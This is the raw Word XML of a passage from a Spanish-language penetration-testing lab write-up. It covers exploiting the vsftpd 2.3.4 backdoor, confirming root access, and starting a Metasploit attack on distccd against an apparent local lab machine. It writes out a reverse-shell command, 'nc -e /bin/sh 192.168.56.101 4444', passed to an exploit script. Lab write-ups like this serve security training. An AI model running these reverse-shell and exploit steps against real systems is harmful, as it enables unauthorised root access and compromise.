      <w:r w:rsidR="00207D1E" w:rsidRPr="00207D1E">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00207D1E" w:rsidRPr="00207D1E">
        <w:t>sh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00207D1E" w:rsidRPr="00207D1E">
        <w:t xml:space="preserve"> 192.168.56.101 4444'</w:t>
      </w:r>
      <w:r w:rsidR="00207D1E">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EF2EFE6" w14:textId="77777777" w:rsidR="00334D22" w:rsidRDefault="00334D22" w:rsidP="00334D22">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
      <w:r w:rsidRPr="00334D22">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6120A300" wp14:editId="4D181BB4">
            <wp:extent cx="5612130" cy="31540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4045"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="18EA132A" w14:textId="77777777" w:rsidR="00207D1E" w:rsidRDefault="00207D1E" w:rsidP="00334D22">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66EDE61B" w14:textId="77777777" w:rsidR="00334D22" w:rsidRDefault="00982F0E" w:rsidP="00334D22">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Podriamos</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> explorar el sistema:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FA18E52" w14:textId="77777777" w:rsidR="00982F0E" w:rsidRDefault="00982F0E" w:rsidP="00982F0E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
      <w:r w:rsidRPr="00982F0E">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3C1A3421" wp14:editId="3AC26ABC">
            <wp:extent cx="5612130" cy="2950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50210"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="03DDCAF1" w14:textId="77777777" w:rsidR="00982F0E" w:rsidRPr="00982F0E" w:rsidRDefault="00982F0E" w:rsidP="00334D22">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Observamos con que privilegios conectamos con el comando “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>whoami</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">” dándonos cuenta de que entramos como </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>root</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, básicamente podemos </w:t>
      </w:r>
      <w:r w:rsidRPr="00982F0E">
        <w:t>ejecutar cualquier comando y tener acceso a todos los archivos y procesos del sistema</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EBF2949" w14:textId="77777777" w:rsidR="00982F0E" w:rsidRDefault="00982F0E" w:rsidP="00982F0E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
      <w:r w:rsidRPr="00982F0E">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="544EBCDD" wp14:editId="59E0B1F3">
            <wp:extent cx="5612130" cy="30295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29585"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="369FB607" w14:textId="77777777" w:rsidR="00207D1E" w:rsidRDefault="00207D1E" w:rsidP="00982F0E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28170296" w14:textId="77777777" w:rsidR="00207D1E" w:rsidRDefault="00207D1E" w:rsidP="00982F0E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="15CAF861" w14:textId="77777777" w:rsidR="00207D1E" w:rsidRDefault="00207D1E" w:rsidP="00982F0E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26A76A72" w14:textId="77777777" w:rsidR="00207D1E" w:rsidRDefault="00207D1E" w:rsidP="00207D1E">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Explotación de la vulnerabilidad </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>vsftpd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 2.34</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FAB5CA5" w14:textId="77777777" w:rsidR="00207D1E" w:rsidRDefault="00207D1E" w:rsidP="00207D1E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Identificamos la vulnerabilidad y el puerto con el análisis logrado por nmap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C0E1FD9" w14:textId="77777777" w:rsidR="00207D1E" w:rsidRDefault="00207D1E" w:rsidP="00207D1E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
      <w:r w:rsidRPr="00207D1E">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6BB0532F" wp14:editId="6275930E">
            <wp:extent cx="5612130" cy="62134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213475"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="74E8B60C" w14:textId="77777777" w:rsidR="00207D1E" w:rsidRDefault="00207D1E" w:rsidP="00207D1E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E9CF20F" w14:textId="77777777" w:rsidR="00207D1E" w:rsidRDefault="00207D1E" w:rsidP="00207D1E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05FEDB21" w14:textId="77777777" w:rsidR="00207D1E" w:rsidRDefault="00207D1E" w:rsidP="00207D1E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D2944E0" w14:textId="77777777" w:rsidR="00207D1E" w:rsidRDefault="00207D1E" w:rsidP="00207D1E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53440E94" w14:textId="77777777" w:rsidR="00207D1E" w:rsidRDefault="00207D1E" w:rsidP="00207D1E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74F02F5C" w14:textId="77777777" w:rsidR="00207D1E" w:rsidRDefault="00207D1E" w:rsidP="00207D1E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D55D655" w14:textId="77777777" w:rsidR="00207D1E" w:rsidRDefault="00207D1E" w:rsidP="00207D1E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Buscamos un </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>exploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> con </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>google</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> y lo analizamos </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="210C42BD" w14:textId="77777777" w:rsidR="00207D1E" w:rsidRDefault="00207D1E" w:rsidP="00207D1E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
      <w:r w:rsidRPr="00207D1E">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6674174D" wp14:editId="2CA4C213">
            <wp:extent cx="5612130" cy="29565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56560"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E69078D" w14:textId="77777777" w:rsidR="00207D1E" w:rsidRDefault="00207D1E" w:rsidP="00207D1E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Creamos un nuevo archivo en </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>kali</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> dentro de la carpeta donde queramos lanzar el </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>exploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> con el comando sudo nano &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nombre_del_archivo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>&gt;.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>py</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, copiamos el contenido del script y lo pegamos dentro del archivo que recién hemos creado, guardamos con </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ctrl+o</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, aceptamos la ubicación y el nombre del archivo con </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>enter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> y salimos con </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ctrl+x</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, nos aseguramos que se haya guardado bien el archivo y damos privilegios de ejecución con sudo </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>chmod+x</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nombre_del_archivo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>&gt;.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>py</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E53A395" w14:textId="77777777" w:rsidR="00207D1E" w:rsidRDefault="00207D1E" w:rsidP="00207D1E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
      <w:r w:rsidRPr="00207D1E">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0EAECE1A" wp14:editId="2196B5FE">
            <wp:extent cx="5612130" cy="31451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45155"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="79B7729A" w14:textId="77777777" w:rsidR="00207D1E" w:rsidRDefault="00207D1E" w:rsidP="00207D1E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Nos aseguramos que tenga </w:t>
      </w:r>
      <w:r w:rsidR="00DB59B0">
        <w:t xml:space="preserve">privilegios de ejecución con el comando sudo </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00DB59B0">
        <w:t>chmod</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00DB59B0">
        <w:t xml:space="preserve"> +x vsftpd.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DB4783B" w14:textId="77777777" w:rsidR="00DB59B0" w:rsidRDefault="00DB59B0" w:rsidP="00DB59B0">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
      <w:r w:rsidRPr="00DB59B0">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="632568DA" wp14:editId="61F92C16">
            <wp:extent cx="5612130" cy="31642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64205"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F7533B1" w14:textId="77777777" w:rsidR="00DB59B0" w:rsidRDefault="00DB59B0" w:rsidP="00C558D6">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Nos queda lanzar el </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>exploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> que tenemos ya guardado contra la máquina que ha presentado dicha vulnerabilidad, antes de eso debemos de poner a la escucha el puerto por donde entraremos con nuestra reverse Shell. De acuerdo con el manual del autor el comando a lanzar es </w:t>
      </w:r>
      <w:r w:rsidR="00C558D6" w:rsidRPr="00C558D6">
        <w:t>./vsftpd.py 192.168.56.102 21 '</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00C558D6" w:rsidRPr="00C558D6">
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00C558D6" w:rsidRPr="00C558D6">
        <w:t xml:space="preserve"> -e /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00C558D6" w:rsidRPr="00C558D6">
        <w:t>bin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00C558D6" w:rsidRPr="00C558D6">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00C558D6" w:rsidRPr="00C558D6">
        <w:t>sh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00C558D6" w:rsidRPr="00C558D6">
        <w:t xml:space="preserve"> 192.168.56.101 4444'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E4CF959" w14:textId="77777777" w:rsidR="00C558D6" w:rsidRDefault="00C558D6" w:rsidP="00C558D6">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
      <w:r w:rsidRPr="00C558D6">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2D344FE2" wp14:editId="3EA72F1C">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5A06A253" w14:textId="77777777" w:rsidR="00C558D6" w:rsidRPr="00982F0E" w:rsidRDefault="00C558D6" w:rsidP="00C558D6">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Observamos primero que podemos ver las carpetas lo que quiere decir que estamos dentro mediante el procesos de reverse Shell también observamos con que privilegios conectamos, esto lo logramos con el comando “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>whoami</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">” </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cerciorandonos</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> de que entramos como </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>root</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> y en esencia podemos </w:t>
      </w:r>
      <w:r w:rsidRPr="00982F0E">
        <w:t>ejecutar cualquier comando y tener acceso a todos los archivos y procesos del sistema</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B8E1F92" w14:textId="77777777" w:rsidR="00C558D6" w:rsidRDefault="00C558D6" w:rsidP="00C558D6">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
      <w:r w:rsidRPr="00C558D6">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4AE95F07" wp14:editId="67771338">
            <wp:extent cx="5612130" cy="31572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7220"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="265E0094" w14:textId="77777777" w:rsidR="00C558D6" w:rsidRDefault="00C558D6" w:rsidP="00C558D6">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Explotación automática utilizando </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7F48EDC0" w14:textId="77777777" w:rsidR="00C558D6" w:rsidRDefault="00C558D6" w:rsidP="00C558D6">
      <w:r>
        <w:t xml:space="preserve">Utilizar el software </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, que se incluye en </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>kali</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Linux, ofrece una forma de ejecutar </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>exploits</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> a vulnerabilidades conocidas de forma automática, </w:t>
      </w:r>
      <w:r w:rsidR="00165FA4">
        <w:t xml:space="preserve">fundamentalmente funciona así, tenemos un software que se especializa en lanzar </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00165FA4">
        <w:t>exploits</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00165FA4">
        <w:t xml:space="preserve"> contra objetivos, estos </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00165FA4">
        <w:t>exploits</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00165FA4">
        <w:t xml:space="preserve"> vienen ya precargados en </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00165FA4">
        <w:t>metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00165FA4">
        <w:t xml:space="preserve">, también vienen muchos </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00165FA4">
        <w:t>payloads</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00165FA4">
        <w:t xml:space="preserve"> ya precargados, se elige alguno de ellos y se lanza contra la dirección IP y el puerto del objetivo donde se ha encontrado su vulnerabilidad utilizando la RHOSTS y RPORT así como el comando set para cada uno de los comandos a lanzar, ahora, también necesitamos especificar donde vamos a establecer nuestra Shell reversa, para ello utilizamos LHOST y LPORT con sus respectivos valores. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BD5E399" w14:textId="77777777" w:rsidR="009331C2" w:rsidRDefault="009331C2" w:rsidP="00C558D6"/>
    <w:p w14:paraId="4789405E" w14:textId="77777777" w:rsidR="009331C2" w:rsidRDefault="009331C2" w:rsidP="00C558D6"/>
    <w:p w14:paraId="7777438A" w14:textId="77777777" w:rsidR="009331C2" w:rsidRDefault="009331C2" w:rsidP="00C558D6"/>
    <w:p w14:paraId="35670CD4" w14:textId="77777777" w:rsidR="009331C2" w:rsidRDefault="009331C2" w:rsidP="009331C2">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Explotación automática de </w:t>
      </w:r>
      <w:r w:rsidR="006572DB">
        <w:t xml:space="preserve">la vulnerabilidad </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="004F30AA">
        <w:t>distccd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="004F30AA">
        <w:t xml:space="preserve"> v1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> con </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4D63F90E" w14:textId="77777777" w:rsidR="009331C2" w:rsidRDefault="009331C2" w:rsidP="009331C2">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Identificamos la vulnerabilidad encontrada con nmap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F567856" w14:textId="77777777" w:rsidR="004F30AA" w:rsidRDefault="004F30AA" w:rsidP="004F30AA">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
      <w:r w:rsidRPr="004F30AA">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="75EF65C8" wp14:editId="38B5DB14">
            <wp:extent cx="5612130" cy="31496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49600"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="03534473" w14:textId="77777777" w:rsidR="009331C2" w:rsidRDefault="009331C2" w:rsidP="009331C2">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C75B503" w14:textId="77777777" w:rsidR="009331C2" w:rsidRDefault="009331C2" w:rsidP="009331C2">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Lanzamos </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> con el comando </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> o en su defecto desde el menú de aplicaciones de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>kali</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AAE07A3" w14:textId="77777777" w:rsidR="009331C2" w:rsidRDefault="009331C2" w:rsidP="009331C2">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
      <w:r w:rsidRPr="009331C2">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7C20AC7A" wp14:editId="2BF91E6A">
            <wp:extent cx="5612130" cy="316547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65475"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4167D700" w14:textId="77777777" w:rsidR="004F30AA" w:rsidRDefault="004F30AA" w:rsidP="009331C2">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47AFEC39" w14:textId="77777777" w:rsidR="009331C2" w:rsidRDefault="004F30AA" w:rsidP="009331C2">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Buscamos el </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>exploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> en </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> con el comando “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>search</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>distccd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43061CA6" w14:textId="77777777" w:rsidR="004F30AA" w:rsidRDefault="004F30AA" w:rsidP="004F30AA">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
      <w:r w:rsidRPr="004F30AA">
        <w:rPr>
          <w:noProof/>
